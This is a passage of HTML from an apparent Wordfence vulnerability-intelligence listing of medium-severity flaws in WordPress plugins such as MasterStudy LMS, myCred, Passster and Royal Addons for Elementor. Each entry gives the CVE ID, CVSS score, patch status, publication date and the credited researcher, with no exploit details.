<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13611" target="_blank" rel="noopener noreferrer">							CVE-2026-13611						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kivicare-clinic-management-system" target="_blank" rel="noopener">KiviCare – Clinic &amp; Patient Management System (EHR)</a> <span class="wfvr-software-slug">[kivicare-clinic-management-system]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sai-praneeth-koti" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/da87f3eddb4ac7ac5ccd63ae400c168c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="da87f3eddb4ac7ac5ccd63ae400c168c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sai-praneeth-koti" target="_blank" rel="noopener">Sai Praneeth Koti</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/05e1d30e-441b-44e2-a89b-eba905384673" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fa50080e-5717-47df-925d-9fb40f91fccc" target="_blank" rel="noopener">LearnPress – Sepay Payment &lt; 4.0.3 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78125" target="_blank" rel="noopener noreferrer">							CVE-2026-78125						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 25, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learnpress-sepay-payment" target="_blank" rel="noopener">LearnPress – Sepay Payment</a> <span class="wfvr-software-slug">[learnpress-sepay-payment]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shikhali-jamalzade" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ead6eac6aef4e9f4e2d49ef7f41d9316.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ead6eac6aef4e9f4e2d49ef7f41d9316"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shikhali-jamalzade" target="_blank" rel="noopener">Shikhali Jamalzade</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fa50080e-5717-47df-925d-9fb40f91fccc" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f09b6e61-ebfc-4213-8777-f133de66a30b" target="_blank" rel="noopener">MasterStudy LMS WordPress Plugin – for Online Courses and Education &lt; 3.7.40 &#8211; Unauthenticated Payment Bypass</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81026" target="_blank" rel="noopener noreferrer">							CVE-2026-81026						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/masterstudy-lms-learning-management-system" target="_blank" rel="noopener">MasterStudy LMS WordPress Plugin – for Online Courses and Education</a> <span class="wfvr-software-slug">[masterstudy-lms-learning-management-system]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abdullah-kareem" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8f2147d3a162aeba1f2416afc4c0274c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8f2147d3a162aeba1f2416afc4c0274c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abdullah-kareem" target="_blank" rel="noopener">Abdullah Kareem</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f09b6e61-ebfc-4213-8777-f133de66a30b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1e41e776-f6d1-4d84-9b40-5613762b9e28" target="_blank" rel="noopener">Mobile App for WooCommerce: ShopApper Mobile App Builder Service for WooCommerce &lt;= 0.4.62 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-27330" target="_blank" rel="noopener noreferrer">							CVE-2026-27330						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 25, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mobile-app-for-woocommerce" target="_blank" rel="noopener">Mobile App for WooCommerce: ShopApper Mobile App Builder Service for WooCommerce</a> <span class="wfvr-software-slug">[mobile-app-for-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/phat-rio" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/69c5e2969d579d1351243832fa879b61.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="69c5e2969d579d1351243832fa879b61"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/phat-rio" target="_blank" rel="noopener">Phat RiO</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1e41e776-f6d1-4d84-9b40-5613762b9e28" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7956fe49-b3b3-4f8d-8e90-8719bc2fa0fa" target="_blank" rel="noopener">My Agile Privacy® &lt;= 3.3.6 &#8211; Missing Authorization to Unauthenticated Plugin Settings Modification via map_missing_cookie_shield / map_check_consent_mode_status AJAX Actions</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-17587" target="_blank" rel="noopener noreferrer">							CVE-2026-17587						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/myagileprivacy" target="_blank" rel="noopener">My Agile Privacy® – CMP, Cookie Consent &amp; Privacy Tools</a> <span class="wfvr-software-slug">[myagileprivacy]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7956fe49-b3b3-4f8d-8e90-8719bc2fa0fa" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0f379d56-c4d6-4a87-82b5-ca9a62a9b319" target="_blank" rel="noopener">NewPath WildApricotPress Add-on – Member Directory &lt;= 1.0.0 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13736" target="_blank" rel="noopener noreferrer">							CVE-2026-13736						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/newpath-wildapricotpress-add-on-member-directory" target="_blank" rel="noopener">NewPath WildApricotPress Add-on – Member Directory</a> <span class="wfvr-software-slug">[newpath-wildapricotpress-add-on-member-directory]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/huynh-kien-minh" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/1732348be5694e5c9a42ec41f1987218.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1732348be5694e5c9a42ec41f1987218"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/huynh-kien-minh" target="_blank" rel="noopener">Huynh Kien Minh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0f379d56-c4d6-4a87-82b5-ca9a62a9b319" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5958f5ba-523e-496b-b696-2887880203a4" target="_blank" rel="noopener">Newsletters &lt; 4.17 &#8211; Insufficient Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-17520" target="_blank" rel="noopener noreferrer">							CVE-2026-17520						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/newsletters-lite" target="_blank" rel="noopener">Newsletters</a> <span class="wfvr-software-slug">[newsletters-lite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener">Erwan LR</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5958f5ba-523e-496b-b696-2887880203a4" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8b51556f-5a42-4061-80d8-bd37a6405a7a" target="_blank" rel="noopener">Passster – Password Protect Pages and Content &lt; 4.3.9 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-17559" target="_blank" rel="noopener noreferrer">							CVE-2026-17559						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/content-protector" target="_blank" rel="noopener">Passster – Password Protect Pages and Content</a> <span class="wfvr-software-slug">[content-protector]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener">Erwan LR</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8b51556f-5a42-4061-80d8-bd37a6405a7a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b5d08207-9480-42ef-b7b4-b7d01a839c85" target="_blank" rel="noopener">Points Management System For Gamification, Ranks, Badges, and Loyalty Rewards Program – myCred &lt; 3.2.5 &#8211; Unauthenticated Payment Bypass</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15150" target="_blank" rel="noopener noreferrer">							CVE-2026-15150						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mycred" target="_blank" rel="noopener">Points Management System For Gamification, Ranks, Badges, and Loyalty Rewards Program – myCred</a> <span class="wfvr-software-slug">[mycred]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/muni-nitish-kumar-yaddala-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/3bfe6fa6dcd46d4fe2d2e08ff44bcd5d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3bfe6fa6dcd46d4fe2d2e08ff44bcd5d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/muni-nitish-kumar-yaddala-2" target="_blank" rel="noopener">Muni Nitish Kumar Yaddala</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b5d08207-9480-42ef-b7b4-b7d01a839c85" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2f262610-35e7-49fe-997b-3c7c5ce6cedf" target="_blank" rel="noopener">Privacy Policy Generator, Terms &amp; Conditions, GDPR, CCPA, Cookie Policy &amp; Disclaimer Templates – WPLP Legal Pages &lt; 3.7.1 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16984" target="_blank" rel="noopener noreferrer">							CVE-2026-16984						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wplegalpages" target="_blank" rel="noopener">Privacy Policy Generator, Terms &amp; Conditions, GDPR, CCPA, Cookie Policy &amp; Disclaimer Templates – WPLP Legal Pages</a> <span class="wfvr-software-slug">[wplegalpages]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vaibhav-narkhede-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/5289964fa4dd52b6eccff68e7a6df156.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5289964fa4dd52b6eccff68e7a6df156"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vaibhav-narkhede-2" target="_blank" rel="noopener">Vaibhav Narkhede</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2f262610-35e7-49fe-997b-3c7c5ce6cedf" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6c0880a9-3948-4103-9d7e-0b0223b32d91" target="_blank" rel="noopener">Project Manager – AI Powered Project Management, Task Management, Kanban Board &amp; Time Tracker 2.1.0 &#8211; 4.0.6 &#8211; Unauthenticated Subscriber Account Creation</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-74928" target="_blank" rel="noopener noreferrer">							CVE-2026-74928						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wedevs-project-manager" target="_blank" rel="noopener">Project Manager – AI Powered Project Management, Task Management, Kanban Board &amp; Time Tracker</a> <span class="wfvr-software-slug">[wedevs-project-manager]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/usama-arshad" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2290ce797e74f0d83f941dfac9af5ed1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2290ce797e74f0d83f941dfac9af5ed1"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/usama-arshad" target="_blank" rel="noopener">Usama Arshad</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6c0880a9-3948-4103-9d7e-0b0223b32d91" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/36fa7191-a4a9-40a5-896e-18e16525a5fb" target="_blank" rel="noopener">RepairBuddy – Repair Shop CRM &amp; Booking Plugin for WordPress &lt;= 4.1223 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78291" target="_blank" rel="noopener noreferrer">							CVE-2026-78291						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/computer-repair-shop" target="_blank" rel="noopener">RepairBuddy – Repair Shop CRM &amp; Booking Plugin for WordPress</a> <span class="wfvr-software-slug">[computer-repair-shop]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/supakiad-s-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/45ae3007a457a80b6d668a0c9853b980.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="45ae3007a457a80b6d668a0c9853b980"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/supakiad-s-2" target="_blank" rel="noopener">Supakiad S.</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/36fa7191-a4a9-40a5-896e-18e16525a5fb" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b992bdd4-7abf-436e-b123-aaedbf33cffc" target="_blank" rel="noopener">Return Refund and Exchange For WooCommerce &lt; 4.6.4 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-77695" target="_blank" rel="noopener noreferrer">							CVE-2026-77695						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-refund-and-exchange-lite" target="_blank" rel="noopener">Return Refund and Exchange For WooCommerce</a> <span class="wfvr-software-slug">[woo-refund-and-exchange-lite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shikhali-jamalzade" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ead6eac6aef4e9f4e2d49ef7f41d9316.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ead6eac6aef4e9f4e2d49ef7f41d9316"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shikhali-jamalzade" target="_blank" rel="noopener">Shikhali Jamalzade</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b992bdd4-7abf-436e-b123-aaedbf33cffc" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/df06f6c7-98b8-4d17-aa53-c5f13ada7c62" target="_blank" rel="noopener">Royal Addons for Elementor – Addons and Templates Kit for Elementor &lt; 1.7.1066 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13406" target="_blank" rel="noopener noreferrer">							CVE-2026-13406						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 26, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/royal-elementor-addons" target="_blank" rel="noopener">Royal Addons for Elementor – Addons and Templates Kit for Elementor</a> <span class="wfvr-software-slug">[royal-elementor-addons]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/meher-sudhakar-abbireddi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/9ce567c2aebe49665baff705399d2e66.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9ce567c2aebe49665baff705399d2e66"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/meher-sudhakar-abbireddi" target="_blank" rel="noopener">Meher Sudhakar Abbireddi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
